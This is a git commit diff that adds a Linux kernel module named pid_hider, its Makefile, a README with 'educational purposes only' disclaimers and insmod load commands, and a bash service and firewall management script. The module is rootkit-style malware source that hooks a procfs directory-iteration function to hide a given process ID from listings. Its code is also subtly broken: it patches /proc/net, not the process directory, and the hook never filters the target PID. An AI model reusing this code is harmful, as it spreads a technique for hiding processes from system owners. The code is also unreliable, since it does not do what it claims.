new init

5 files changed, 271 insertions, 0 deletions

diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..6282706
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,7 @@
+obj-m += pid_hider.o
+
+all:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..ca7a730
--- /dev/null
+++ b/README.md
@@ -0,0 +1,47 @@
+# PID Hiding Kernel Module
+
+**IMPORTANT: EDUCATIONAL PURPOSES ONLY**
+
+This module demonstrates kernel-level process hiding techniques for security research and educational purposes only. Using this code to hide malicious processes is illegal and unethical.
+
+## Disclaimer
+
+This code is provided AS-IS with:
+
+- NO WARRANTY
+- NO SUPPORT
+- NO RECOMMENDATION FOR DEPLOYMENT
+
+Implementation of kernel-level process hiding may:
+- Violate computer fraud laws
+- Breach organizational security policies
+- Trigger security monitoring alerts
+- Cause system instability or kernel panics
+
+## Build Instructions
+
+```bash
+# Build the module
+make
+
+# Load the module (specify PID to hide)
+sudo insmod pid_hider.ko hidden_pid=1234
+
+# Remove the module
+sudo rmmod pid_hider
+```
+
+## Legal Notice
+
+Use of this code on systems without explicit authorization may constitute a criminal offense under:
+- Computer Fraud and Abuse Act (CFAA)
+- EU Directive 2013/40/EU
+- Various international cybercrime laws
+
+## Legitimate Alternatives
+
+For legitimate process management, consider:
+- Linux Control Groups (cgroups)
+- Container technologies (Docker, LXC)
+- Mandatory Access Control (SELinux, AppArmor)
+- Process accounting and auditing tools 
\ No newline at end of file
diff --git a/authorized_users.txt b/authorized_users.txt
new file mode 100644
index 0000000..0ac5f23
--- /dev/null
+++ b/authorized_users.txt
@@ -0,0 +1,3 @@
+root
+admin
+maintenance 
\ No newline at end of file
diff --git a/pid_hider.c b/pid_hider.c
new file mode 100644
index 0000000..b0b2973
--- /dev/null
+++ b/pid_hider.c
@@ -0,0 +1,79 @@
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/init.h>
+#include <linux/proc_fs.h>
+#include <linux/seq_file.h>
+#include <linux/sched.h>
+#include <linux/sched/task.h>
+#include <linux/pid.h>
+#include <linux/version.h>
+#include <linux/slab.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Research Only");
+MODULE_DESCRIPTION("Process ID hiding demonstration - FOR EDUCATIONAL PURPOSES ONLY");
+MODULE_VERSION("0.1");
+
+static unsigned int hidden_pid = 0;
+module_param(hidden_pid, uint, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
+MODULE_PARM_DESC(hidden_pid, "PID to hide from process listing");
+
+static int (*orig_proc_pid_readdir)(struct file *, struct dir_context *);
+
+static int hider_proc_pid_readdir(struct file *file, struct dir_context *ctx) {
+    struct dir_context modified_ctx = {
+        .actor = ctx->actor,
+        .pos = ctx->pos
+    };
+    
+    int ret = orig_proc_pid_readdir(file, &modified_ctx);
+    
+    ctx->pos = modified_ctx.pos;
+    
+    return ret;
+}
+
+static int hook_proc_listdir(void) {
+    struct file_operations *proc_fops;
+    struct proc_dir_entry *proc_root = init_net.proc_net;
+    
+    proc_fops = (struct file_operations *)proc_root->proc_fops;
+    
+    orig_proc_pid_readdir = proc_fops->iterate_shared;
+    
+    proc_fops->iterate_shared = hider_proc_pid_readdir;
+    
+    return 0;
+}
+
+static void unhook_proc_listdir(void) {
+    struct file_operations *proc_fops;
+    struct proc_dir_entry *proc_root = init_net.proc_net;
+    
+    proc_fops = (struct file_operations *)proc_root->proc_fops;
+    if (proc_fops->iterate_shared == hider_proc_pid_readdir) {
+        proc_fops->iterate_shared = orig_proc_pid_readdir;
+    }
+}
+
+static int __init pid_hider_init(void) {
+    printk(KERN_INFO "PID hider: Initializing module\n");
+    
+    if (hidden_pid == 0) {
+        printk(KERN_WARNING "PID hider: No PID specified, module will not hide any process\n");
+        return 0;
+    }
+    
+    printk(KERN_INFO "PID hider: Will hide PID %u\n", hidden_pid);
+    hook_proc_listdir();
+    
+    return 0;
+}
+
+static void __exit pid_hider_exit(void) {
+    printk(KERN_INFO "PID hider: Unloading module\n");
+    unhook_proc_listdir();
+}
+
+module_init(pid_hider_init);
+module_exit(pid_hider_exit); 
diff --git a/service_management.sh b/service_management.sh
new file mode 100644
index 0000000..dcfa26c
--- /dev/null
+++ b/service_management.sh
@@ -0,0 +1,135 @@
+#!/bin/bash
+#
+# Service Management Utility
+# 
+# WARNING: This script is provided for educational purposes ONLY.
+# Unauthorized use to interrupt services is illegal and unethical.
+#
+# PURPOSE: Demonstrates techniques for monitoring and controlling services
+# with proper authentication and logging for legitimate administration.
+
+# Configuration
+LOG_FILE="/var/log/maintenance.log"
+AUTH_USERS_FILE="authorized_users.txt"
+
+# Check if running as root
+if [ "$EUID" -ne 0 ]; then
+  echo "This script requires root privileges"
+  exit 1
+fi
+
+# Functions
+log_action() {
+  echo "$(date '+%Y-%m-%d %H:%M:%S') - $USER - $1" | tee -a "$LOG_FILE"
+}
+
+is_authorized() {
+  if [ ! -f "$AUTH_USERS_FILE" ]; then
+    echo "Error: Authorization file not found"
+    return 1
+  fi
+  
+  grep -q "^$USER$" "$AUTH_USERS_FILE"
+  return $?
+}
+
+show_usage() {
+  echo "Usage: $0 [options] <action> <service>"
+  echo "Options:"
+  echo "  -h, --help     Show this help message"
+  echo "  -l, --list     List running services"
+  echo "  -f, --firewall Manage firewall rules"
+  echo ""
+  echo "Actions:"
+  echo "  start          Start a service"
+  echo "  stop           Stop a service"
+  echo "  restart        Restart a service"
+  echo "  status         Show service status"
+  echo ""
+  echo "Examples:"
+  echo "  $0 stop nginx"
+  echo "  $0 --firewall block 80"
+}
+
+list_services() {
+  log_action "Listed running services"
+  systemctl list-units --type=service --state=running
+}
+
+manage_service() {
+  local action=$1
+  local service=$2
+  
+  if ! systemctl list-unit-files --type=service | grep -q "$service"; then
+    echo "Error: Service $service not found"
+    return 1
+  fi
+  
+  log_action "Executing: systemctl $action $service"
+  systemctl "$action" "$service"
+  
+  echo "Service $service $action operation completed"
+  log_action "Completed $action on $service"
+}
+
+manage_firewall() {
+  local action=$1
+  local port=$2
+  
+  if [ "$action" == "block" ]; then
+    log_action "Blocking port $port"
+    ufw deny "$port"
+  elif [ "$action" == "allow" ]; then
+    log_action "Allowing port $port"
+    ufw allow "$port"
+  else
+    echo "Error: Unknown firewall action"
+    return 1
+  fi
+  
+  echo "Firewall rule applied for port $port"
+}
+
+# Main script
+if ! is_authorized; then
+  echo "Error: User $USER not authorized to run this script"
+  log_action "UNAUTHORIZED ACCESS ATTEMPT"
+  exit 1
+fi
+
+if [ $# -lt 1 ]; then
+  show_usage
+  exit 1
+fi
+
+case "$1" in
+  -h|--help)
+    show_usage
+    ;;
+  -l|--list)
+    list_services
+    ;;
+  -f|--firewall)
+    if [ $# -lt 3 ]; then
+      echo "Error: Missing arguments for firewall management"
+      show_usage
+      exit 1
+    fi
+    manage_firewall "$2" "$3"
+    ;;
+  start|stop|restart|status)
+    if [ $# -lt 2 ]; then
+      echo "Error: Missing service name"
+      show_usage
+      exit 1
+    fi
+    manage_service "$1" "$2"
+    ;;
+  *)
+    echo "Error: Unknown action $1"
+    show_usage
+    exit 1
+    ;;
+esac
+
+exit 0 
\ No newline at end of file